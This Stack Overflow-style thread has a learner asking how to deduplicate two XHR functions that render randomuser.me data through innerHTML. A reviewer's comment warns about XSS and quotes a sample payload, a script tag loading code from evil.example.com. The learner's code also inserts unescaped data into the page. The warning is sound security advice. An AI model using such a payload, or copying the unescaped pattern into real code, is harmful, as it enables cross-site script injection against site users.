# How to refactor the api or make this code simpler?

Tags: javascript, json, ajax, api, refactoring

I'm learning ajax json, I'm just testing how to pull the data, so the idea when hover the number, it pulls the data and show the content for name and email.
Number 1 is to show name and number 2 is to show email.

The api is working, but I'm not quite sure how to refactor or make the code simpler.

Right now I just duplicate the code from one to another, I try to add callback function, but I feel I'm doing it wrong,

how to refactor or make my code simpler without duplicating the code?

```js
const button = document.querySelector(".testName");
const buttonTest = document.querySelector(".testLastName");

const wrapper = document.querySelector(".wrapper");

const randomPerson = document.querySelector("random-person");



button.addEventListener("mouseover", function () {
    getData("https://randomuser.me/api/");
    console.log("first name");
})

buttonTest.addEventListener("mouseover", function () {
    getDataTest("https://randomuser.me/api/");
    console.log("last name");
})

function getData(url) {
    const request = new XMLHttpRequest();

    request.open("GET", url, true);
    //console.log(request);

    request.onload = function () {
        if (this.status === 200) {
            const data = JSON.parse(this.responseText);
            console.log(data);

            let display = "";

            data.results.forEach(function (person) {
                display += `
                    <div class="person">
                        <img class="random-image-js" src=${person.picture.large}></img>
                        <div class="person-category">
                            <p>Name: <br> ${person.name.first}</p>
                        </div>
                        
                        
                    </div>`
            });

   

            wrapper.innerHTML = display;

        }
        else {
            console.log(this.statusText);
        }
    }

    request.onerror = function () {
        console.log("There was a mistake");
    }

    request.send();
}

function getDataTest(url) {
    const request = new XMLHttpRequest();

    request.open("GET", url, true);
    //console.log(request);

    request.onload = function () {
        if (this.status === 200) {
            const data = JSON.parse(this.responseText);
            console.log(data);

            let display = "";

            data.results.forEach(function (person) {
                display += `
                    <div class="person">
                        <img class="random-image-js" src=${person.picture.large}></img>
                        <div class="person-category">
                            <p>Email: <br> ${person.email}</p>
                        </div>
                    </div>`
            });

            wrapper.innerHTML = display;

        }
        else {
            console.log(this.statusText);
        }
    }

    request.onerror = function () {
        console.log("There was a mistake");
    }

    request.send();
}
```

```css
body {
  padding: 0;
  margin: 0;
  font-family: sans-serif;
}

.random-wrapper {
  border: 1px solid green;
  display: flex;
  flex-direction: column;
  justify-content: center;
  align-items: center;
}

.random-image-js {
  width: 150px;
  border-radius: 50%;
}

.random-button:focus {
  outline: none;
}

.wrapper {
  border: 1px solid green;
  width: 100%;
  margin-top: 50px;
}

.person {
  width: 1000px;
  border: 1px solid green;
  margin: auto;
  text-align: center;
}

.person-category {
  display: flex;
  justify-content: center;
}

.person-category p {
  display: flex;
  flex-direction: column;
  margin: 15px;
}

.test {
  display: flex;
}

.test p {
  padding: 20px;
  border: 1px solid green;
}
```

```html
<div class="random-wrapper">
  <div class="wrapper"></div>

  <div class="test">
       <p class="testName">1</p>
       <p class="testLastName">2</p>
  </div>
</div>
```

Comment: If your code works and you're looking for feedback, that's a question to ask on [Code Review](https://codereview.stackexchange.com/), although you's also want to verify that they consider it [on-topic](https://codereview.stackexchange.com/help/on-topic).

Comment: @TiesonT. Yes, but I'm not sure if my approach or code itself is correct

Comment: Firstly, never concatenate arbitrary text data into the context of HTML.  In your existing code, you're using template strings to insert the text for name directly into the HTML tags, but no escaping is occurring of any kind.  Suppose someone has entered their name as `<script src="https://evil.example.com/evil.js"></script>`... now they can hijack the site for all users where their name occurs.  It also opens you up to creating invalid HTML in general.

Comment: Next, your question doesn't really seem to have anything to do with AJAX... it seems more about how to handle templating client-side.  For that, there are hundreds of frameworks and template engines.  If you're really just changing these two fields, do it in code.  `document.querySelector('.testName').innerText = 'some name`  If you're doing something more complicated, consider a framework like Riot.js, or just EJS if you don't need a whole application framework.

Comment: @Brad So if I don't concatenate, how to show the data? also I don't quite understand the second comment for adding: document.querySelector('.testName').innerText = 'some name

Comment: @Udzzzz The whole second comment explains what to do instead.  Try that code I mention.  Look into Riot.js.  Check out EJS.